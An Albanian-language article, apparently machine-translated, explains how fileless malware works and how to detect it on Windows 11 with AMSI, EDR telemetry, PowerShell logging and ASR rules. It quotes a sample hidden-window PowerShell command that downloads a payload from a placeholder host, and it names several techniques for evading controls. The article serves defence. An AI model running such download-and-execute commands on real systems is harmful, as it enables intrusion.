Si të zbuloni malware të rrezikshëm pa skedarë në Windows 11

¿Si të zbulohet programi keqdashës i rrezikshëm pa skedarë? Aktiviteti i sulmeve pa skedarë është rritur ndjeshëm, dhe për ta përkeqësuar situatën, Windows 11 nuk është imun ndaj tijKjo qasje anashkalon diskun dhe mbështetet në memorien dhe mjetet legjitime të sistemit; prandaj programet antivirus të bazuara në nënshkrime kanë vështirësi. Nëse po kërkoni një mënyrë të besueshme për ta zbuluar atë, përgjigjja qëndron në kombinimin e telemetria, analiza e sjelljes dhe kontrollet e Windows.

Në ekosistemin aktual, fushatat që abuzojnë me PowerShell, WMI ose Mshta bashkëjetojnë me teknika më të sofistikuara siç janë injeksionet e memories, persistenca "pa prekur" diskun dhe madje abuzime me firmware-inÇelësi është të kuptohet harta e kërcënimeve, fazat e sulmit dhe sinjalet që ato lënë edhe kur gjithçka ndodh brenda RAM-it.

Çfarë është malware pa skedarë dhe pse është shqetësues në Windows 11?

Kur flasim për kërcënime "pa skedarë", i referohemi kodit të dëmshëm që Nuk keni nevojë të depozitoni ekzekutues të rinj në sistemin e skedarëve për të funksionuar. Zakonisht injektohet në proceset në ekzekutim dhe ekzekutohet në RAM, duke u mbështetur në interpretues dhe skedarë binarë të nënshkruar nga Microsoft (p.sh., PowerShell, WMI, rundll32, mshtaKjo zvogëlon gjurmën tuaj dhe ju lejon të anashkaloni motorët që kërkojnë vetëm skedarë të dyshimtë.

Edhe dokumentet e zyrës ose PDF-të që shfrytëzojnë dobësitë për të nisur komanda konsiderohen pjesë e fenomenit, sepse aktivizoni ekzekutimin në kujtesë pa lënë binarë të dobishëm për analizë. Abuzimi i makro dhe DDE Në Office, meqenëse kodi funksionon në procese legjitime si WinWord.

Sulmuesit kombinojnë inxhinierinë sociale (phishing, lidhje spam) me kurthe teknike: klikimi i përdoruesit fillon një zinxhir në të cilin një skript shkarkon dhe ekzekuton ngarkesën përfundimtare në kujtesë, duke shmangur lënien e gjurmëve në disk. Objektivat variojnë nga vjedhja e të dhënave deri te ekzekutimi i ransomware-it, deri te lëvizja anësore e heshtur.

Tipologjitë sipas gjurmës në sistem: nga 'të pastra' në hibride

Për të shmangur konceptet konfuze, është e dobishme të ndahen kërcënimet sipas shkallës së ndërveprimit të tyre me sistemin e skedarëve. Ky kategorizim sqaron Çfarë vazhdon, ku jeton kodi dhe çfarë shenjash lë?.

Lloji I: asnjë aktivitet skedari

Malware plotësisht pa skedarë nuk shkruan asgjë në disk. Një shembull klasik është shfrytëzimi i një dobësi të rrjetit (si vektori EternalBlue dikur) për të implementuar një derë të pasme që ndodhet në memorien e bërthamës (raste si DoublePulsar). Këtu, gjithçka ndodh në RAM dhe nuk ka artefakte në sistemin e skedarëve.

Një tjetër mundësi është ndotja e firmware të komponentëve: BIOS/UEFI, adaptorë rrjeti, periferikë USB (teknika të tipit BadUSB) apo edhe nënsisteme të CPU-së. Ato vazhdojnë gjatë rinisjeve dhe riinstalimeve, me vështirësinë shtesë që Pak produkte inspektojnë firmware-inKëto janë sulme komplekse, më pak të shpeshta, por të rrezikshme për shkak të fshehtësisë dhe qëndrueshmërisë së tyre.

Tipi II: Aktiviteti i arkivimit indirekt

Këtu, programi keqdashës nuk "lë" skedarin e tij të ekzekutueshëm, por përdor kontejnerë të menaxhuar nga sistemi që në thelb ruhen si skedarë. Për shembull, dyert e pasme që instalohen Komandat e PowerShell në repozitorin WMI dhe të aktivizoni ekzekutimin e tij me filtra ngjarjesh. Është e mundur ta instaloni nga rreshti i komandës pa hequr skedarët binare, por repozitori WMI ndodhet në disk si një bazë të dhënash legjitime, duke e bërë të vështirë pastrimin e tij pa ndikuar në sistem.

Nga një këndvështrim praktik, ato konsiderohen pa skedarë, sepse ai kontejner (WMI, Regjistri, etj.) Nuk është një ekzekutues klasik i dallueshëm Dhe pastrimi i tij nuk është i lehtë. Rezultati: këmbëngulje e fshehtë me pak gjurmë "tradicionale".

Tipi III: Kërkon skedarë për të funksionuar

Disa raste mbajnë një qëndrueshmëri 'pa skedar' Në një nivel logjik, ata kanë nevojë për një shkaktar të bazuar në skedar. Shembulli tipik është Kovter: ai regjistron një folje shell për një zgjatim të rastësishëm; kur hapet një skedar me atë zgjatim, nis një skript i vogël që përdor mshta.exe, i cili rindërton vargun keqdashës nga Regjistri.

Hileja është se këto skedarë "karrem" me zgjerime të rastësishme nuk përmbajnë një ngarkesë të analizueshme, dhe pjesa më e madhe e kodit ndodhet në Regjistro (një kontejner tjetër). Kjo është arsyeja pse ato kategorizohen si pa skedarë për nga ndikimi, edhe pse në kuptimin e ngushtë të fjalës ato varen nga një ose më shumë objekte të diskut si shkaktar.

Vektorët dhe 'mikpritësit' e infeksionit: ku hyn dhe ku fshihet

Për të përmirësuar zbulimin, është thelbësore të përcaktohet pika e hyrjes dhe strehuesi i infeksionit. Kjo perspektivë ndihmon në hartimin e kontrolle specifike Jepini përparësi telemetrisë së përshtatshme.

Shfrytëzime

• Bazuar në skedarë (Lloji III): Dokumentet, skedarët ekzekutues, skedarët e trashëguar Flash/Java ose skedarët LNK mund të shfrytëzojnë shfletuesin ose motorin që i përpunon ato për të ngarkuar kodin shell në memorie. Vektori i parë është një skedar, por ngarkesa udhëton në RAM.
• Bazuar në rrjet (Lloji I): ​​Një paketë që shfrytëzon një dobësi (p.sh., në SMB) arrin ekzekutimin në zonën e përdoruesit ose në kernel. WannaCry e bëri të njohur këtë qasje. Ngarkesë direkte e memories pa skedar të ri.

Pajisje

• Pajisjet (Lloji I): ​​Firmware-i i diskut ose i kartës së rrjetit mund të ndryshohet dhe të futet kod. Është e vështirë të inspektohet dhe vazhdon të ekzistojë jashtë sistemit operativ.
• Nënsistemet e CPU-së dhe menaxhimit (Lloji I): ​​Teknologji të tilla si ME/AMT e Intel kanë demonstruar rrugë për të Rrjetëzimi dhe ekzekutimi jashtë sistemit operativSulmon në një nivel shumë të ulët, me potencial të lartë fshehtësie.
• USB (Lloji I): ​​BadUSB ju lejon të riprogramoni një disk USB për të imituar një tastierë ose një kartë rrjeti (NIC) dhe për të ekzekutuar komanda ose për të ridrejtuar trafikun.
• BIOS/UEFI (Lloji I): ​​riprogramim i keqdashës i firmware-it (raste si Mebromi) që funksionon para se të niset Windows.
• Hypervisor (Lloji I): ​​Implementimi i një mini-hipervizori nën sistemin operativ për të fshehur praninë e tij. I rrallë, por tashmë i vërejtur në formën e rootkit-eve të hipervizorit.

Ekzekutimi dhe injektimi

• Bazuar në skedarë (Lloji III): EXE/DLL/LNK ose detyra të planifikuara që nisin injeksione në procese legjitime.
• Makrot (Lloji III): VBA në Office mund të deshifrojë dhe ekzekutojë ngarkesa, duke përfshirë edhe ransomware të plotë, me pëlqimin e përdoruesit përmes mashtrimit.
• Skripte (Lloji II): PowerShell, VBScript ose JScript nga skedari, rreshti i komandës, shërbime, Regjistrim ose WMISulmuesi mund ta shkruajë skriptin në një seancë të largët pa e prekur diskun.
• Regjistrimi i nisjes (MBR/Nisje) (Lloji II): Familje si Petya mbishkruajnë sektorin e nisjes për të marrë kontrollin gjatë nisjes. Është jashtë sistemit të skedarëve, por i arritshëm për sistemin operativ dhe zgjidhjet moderne që mund ta rikthejnë atë.

Si funksionojnë sulmet pa skedarë: fazat dhe sinjalet

Edhe pse nuk lënë skedarë të ekzekutueshëm, fushatat ndjekin një logjikë të fazave. Kuptimi i tyre lejon monitorimin. ngjarjet dhe marrëdhëniet midis proceseve që lënë një gjurmë.

• Qasja fillestareSulme phishing duke përdorur lidhje ose bashkëngjitje, faqe interneti të kompromentuara ose kredenciale të vjedhura. Shumë zinxhirë fillojnë me një dokument të Office që aktivizon një komandë. PowerShell.
• Këmbëngulja: dyer të pasme nëpërmjet WMI (filtra dhe abonime), Çelësat e ekzekutimit të regjistrit ose detyra të planifikuara që rilançojnë skriptet pa një skedar të ri keqdashës.
• EkfiltrimPasi të mblidhet informacioni, ai dërgohet jashtë rrjetit duke përdorur procese të besueshme (shfletues, PowerShell, bitsadmin) për të përzier trafikun.

Ky model është veçanërisht i fshehtë sepse treguesit e sulmit Ato fshihen në normalitet: argumente të linjës së komandës, zinxhir procesesh, lidhje dalëse anomale ose qasje në API-të e injektimit.

Teknika të zakonshme: nga kujtesa në regjistrim

Aktorët mbështeten në një gamë të gjerë metodat që optimizojnë fshehtësinë. Është e dobishme të njihni ato më të zakonshmet për të aktivizuar zbulimin efektiv.

• Banor në kujtimNgarkimi i ngarkesave në hapësirën e një procesi të besuar që pret për aktivizim. rootkits dhe hooks Në bërthamë, ato rrisin nivelin e fshehjes.
• Qëndrueshmëria në RegjistërRuani blloqet e enkriptuara në çelësa dhe rehidratojini ato nga një lëshues legjitim (mshta, rundll32, wscript). Instaluesi i përkohshëm mund të vetëshkatërrohet për të minimizuar gjurmën e tij.
• Fishing kredencialeshDuke përdorur emra përdoruesish dhe fjalëkalime të vjedhura, sulmuesi ekzekuton predha dhe impiante të largëta. qasje e heshtur në Regjistër ose WMI.
• Ransomware 'Pa skedarë'Enkriptimi dhe komunikimi C2 orkestrohen nga RAM-i, duke zvogëluar mundësitë për zbulim derisa dëmi të jetë i dukshëm.
• Kite operative: zinxhirë të automatizuar që zbulojnë dobësitë dhe vendosin ngarkesa vetëm për memorien pasi përdoruesi klikon.
• Dokumente me kodmakro dhe mekanizma si DDE që aktivizojnë komanda pa ruajtur skedarët ekzekutues në disk.

Studimet e industrisë kanë treguar tashmë kulme të dukshme: në një periudhë të vitit 2018, një rritje prej mbi 90% në sulmet e bazuara në skripte dhe në sulmet zinxhir PowerShell, një shenjë se vektori preferohet për efektivitetin e tij.

Sfida për kompanitë dhe furnizuesit: pse bllokimi nuk është i mjaftueshëm

Do të ishte joshëse të çaktivizonit PowerShell ose të ndalonit makrot përgjithmonë, por Do ta prishje operacioninPowerShell është një shtyllë e administratës moderne dhe Office është thelbësor në biznes; bllokimi i verbër shpesh nuk është i realizueshëm.

Për më tepër, ka mënyra për të anashkaluar kontrollet bazë: ekzekutimi i PowerShell përmes DLL-ve dhe rundll32, paketimi i skripteve në EXE, Sillni kopjen tuaj të PowerShell ose edhe të fshehin skriptet në imazhe dhe t'i nxjerrin ato në kujtesë. Prandaj, mbrojtja nuk mund të bazohet vetëm në mohimin e ekzistencës së mjeteve.

Një tjetër gabim i zakonshëm është delegimi i të gjithë vendimit te cloud: nëse agjenti duhet të presë për një përgjigje nga serveri, Ju humbisni parandalimin në kohë realeTë dhënat e telemetrisë mund të ngarkohen për të pasuruar informacionin, por Zbutja duhet të ndodhë në pikën përfundimtare.

Si të zbuloni malware pa skedarë në Windows 11: telemetria dhe sjellja

Strategjia fituese është monitoroni proceset dhe kujtesënJo skedarë. Sjelljet keqdashëse janë më të qëndrueshme sesa format që merr një skedar, duke i bërë ato ideale për motorët e parandalimit.

• AMSI (Ndërfaqja e Skanimit Antimalware)Ai kap skriptet PowerShell, VBScript ose JScript edhe kur ato janë ndërtuar dinamikisht në memorie. I shkëlqyer për kapjen e vargjeve të ngatërruara para ekzekutimit.
• Monitorimi i procesit: fillimi/mbarimi, PID, prindërit dhe fëmijët, rrugët, linjat e komandës dhe hashes, plus pemë ekzekutimi për të kuptuar historinë e plotë.
• Analiza e kujtesëszbulimi i injeksioneve, ngarkesave reflektuese ose PE pa prekur diskun dhe rishikimi i rajoneve të pazakonta të ekzekutueshme.
• Mbrojtja e sektorit të nisjeskontrolli dhe rivendosja e MBR/EFI në rast ndërhyrjeje.

Në ekosistemin e Microsoft, Defender for Endpoint kombinon AMSI, monitorimi i sjelljesSkanimi i kujtesës dhe mësimi automatik i bazuar në cloud përdoren për të shkallëzuar zbulimet kundrejt varianteve të reja ose të errëta. Shitësit e tjerë përdorin qasje të ngjashme me motorët rezidentë të kernelit.

Shembull realist i korrelacionit: nga dokumenti në PowerShell

Imagjinoni një zinxhir ku Outlook shkarkon një bashkëngjitje, Word hap dokumentin, përmbajtja aktive aktivizohet dhe PowerShell hapet me parametra të dyshimtë. Telemetria e duhur do të tregonte rreshti i komandës (p.sh., ExecutionPolicy Bypass, dritare e fshehur), duke u lidhur me një domen të pabesueshëm dhe duke krijuar një proces të degëzuar që instalohet vetë në AppData.

Një agjent me kontekst lokal është i aftë të ndalo dhe mbrapsht aktivitet keqdashës pa ndërhyrje manuale, përveç njoftimit të SIEM ose nëpërmjet email-it/SMS-së. Disa produkte shtojnë një shtresë atribuimi të shkakut rrënjësor (modele të tipit StoryLine), e cila nuk tregon te procesi i dukshëm (Outlook/Word), por te fije e plotë keqdashëse dhe origjina e saj për të pastruar në mënyrë gjithëpërfshirëse sistemin.

Një model tipik komandash për të cilin duhet të keni kujdes mund të duket kështu: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logjika nuk është vargu i saktë, por grupi i sinjaleve: anashkalim i politikës, dritare e fshehur, shkarkim i qartë dhe ekzekutim në memorie.

AMSI, rrjedha dhe roli i secilit aktor: nga pika fundore deri te SOC

Përtej kapjes së skripteve, një arkitekturë e fuqishme orkestron hapa që lehtësojnë hetimin dhe reagimin. Sa më shumë prova para ekzekutimit të ngarkesës, aq më mirë., më mirë.

• Ndërhyrja e skriptitAMSI e dërgon përmbajtjen (edhe nëse gjenerohet në moment) për analiza statike dhe dinamike në një kanal programesh keqdashëse.
• Ngjarjet e procesitMblidhen PID-të, binarët, hash-et, rrugët dhe të dhëna të tjera. argumente, duke krijuar pemët e procesit që çuan në ngarkesën përfundimtare.
• Zbulimi dhe raportimiZbulimet shfaqen në konsolën e produktit dhe përcillen në platformat e rrjetit (NDR) për vizualizim të fushatës.
• Garancitë e përdoruesitEdhe nëse një skript injektohet në memorie, framework-u AMSI e kap atë në versionet e pajtueshme të Windows.
• Aftësitë e administratorit: konfigurimi i politikës për të aktivizuar inspektimin e skriptit, bllokim i bazuar në sjellje dhe krijimin e raporteve nga konzola.
• Puna e SOC-së: nxjerrja e artefakteve (VM UUID, versioni i sistemit operativ, lloji i skriptit, procesi iniciues dhe prindi i tij, hashet dhe linjat e komandës) për të rikrijuar historinë dhe rregullat e ashensorit e ardhmja.

Kur platforma lejon eksportimin e memoria e përkohshme Lidhur me ekzekutimin, studiuesit mund të gjenerojnë zbulime të reja dhe të pasurojnë mbrojtjen kundër varianteve të ngjashme.

Masat praktike në Windows 11: parandalimi dhe gjuetia

Përveç EDR me inspektim të memories dhe AMSI, Windows 11 ju lejon të mbyllni hapësirat e sulmit dhe të përmirësoni dukshmërinë me kontrolle vendase.

• Regjistrimi dhe kufizimet në PowerShellAktivizon Regjistrimin e Blloqeve të Skriptit dhe Regjistrimin e Moduleve, zbaton modalitete të kufizuara aty ku është e mundur dhe kontrollon përdorimin e Anashkalimi/I fshehur.
• Rregullat e Reduktimit të Sipërfaqes së Sulmit (ASR): bllokon nisjet e skripteve nga proceset e Office dhe Abuzimi me WMI/PSExec kur nuk është e nevojshme.
• Politikat e makrove të Office: çaktivizon si parazgjedhje nënshkrimin e brendshëm të makros dhe listat strikte të besimit; monitoron rrjedhat e trashëguara të DDE.
• Auditimi dhe Regjistri i WMI-sëmonitoron abonimet e ngjarjeve dhe çelësat e ekzekutimit automatik (Run, RunOnce, Winlogon), si dhe krijimin e detyrave të planifikuara.
• Mbrojtja e nisjesAktivizon Secure Boot (Nisjen e Sigurt), kontrollon integritetin MBR/EFI dhe vërteton që nuk ka modifikime gjatë nisjes.
• Arnim dhe forcimMbyll dobësitë e shfrytëzueshme në shfletues, komponentë të Office dhe shërbime të rrjetit.
• ndërgjegjësimi: trajnon përdoruesit dhe ekipet teknike për phishing dhe sinjalet e ekzekutime të fshehta.

Për kërkim, përqendrohuni në pyetje rreth: krijimit të proceseve nga Office drejt PowerShell/MSHTA, argumenteve me varg shkarkimi/skedar shkarkimiSkripte me errësim të qartë, injeksione reflektuese dhe rrjete dalëse drejt TLD-ve të dyshimta. Kryqëzoni referencat e këtyre sinjaleve me reputacionin dhe frekuencën për të zvogëluar zhurmën.

Çfarë mund të zbulojë secili motor sot?

Zgjidhjet e ndërmarrjeve të Microsoft kombinojnë AMSI-në, analizat e sjelljes, shqyrto kujtesën dhe mbrojtje të sektorit të nisjes, plus modele të ML të bazuara në cloud për t'u shkallëzuar kundër kërcënimeve të reja. Shitësit e tjerë zbatojnë monitorim në nivel bërthame për të dalluar softuerin keqdashës nga ai beninj me rikthim automatik të ndryshimeve.

Një qasje e bazuar në histori ekzekutimesh Ju lejon të identifikoni shkakun rrënjësor (për shembull, një bashkëngjitje të Outlook që aktivizon një zinxhir) dhe të zbutni të gjithë pemën: skriptet, çelësat, detyrat dhe skedarët binare të ndërmjetëm, duke shmangur ngecjen në simptomën e dukshme.

Gabimet e zakonshme dhe si t'i shmangni ato

Bllokimi i PowerShell pa një plan alternativ menaxhimi jo vetëm që është jopraktik, por ka edhe mënyra për ta thirrur atë në mënyrë indirekteE njëjta gjë vlen edhe për makrot: ose i menaxhoni ato me politika dhe nënshkrime, ose biznesi do të vuajë. Është më mirë të përqendroheni te telemetria dhe rregullat e sjelljes.

Një tjetër gabim i zakonshëm është të besosh se aplikacionet e vendosjes në listën e bardhë zgjidhin gjithçka: teknologjia pa skedarë mbështetet pikërisht në këtë. aplikacione të besuaraKontrolli duhet të vëzhgojë se çfarë bëjnë ata dhe si lidhen, jo vetëm nëse u lejohet.

Me të gjitha sa më sipër, programet keqdashëse pa skedarë pushojnë së qeni një "fantazmë" kur monitoroni atë që ka vërtet rëndësi: sjellja, kujtesa dhe origjina të çdo ekzekutimi. Kombinimi i AMSI-t, telemetrisë së pasur të procesit, kontrolleve native të Windows 11 dhe një shtrese EDR me analizë të sjelljes ju jep avantazhin. Shtoni në ekuacion politika realiste për makrot dhe PowerShell, auditimin WMI/Regjistrit dhe gjueti që i jep përparësi linjave të komandave dhe pemëve të proceseve, dhe keni një mbrojtje që i ndërpret këto zinxhirë para se të bëjnë zhurmë.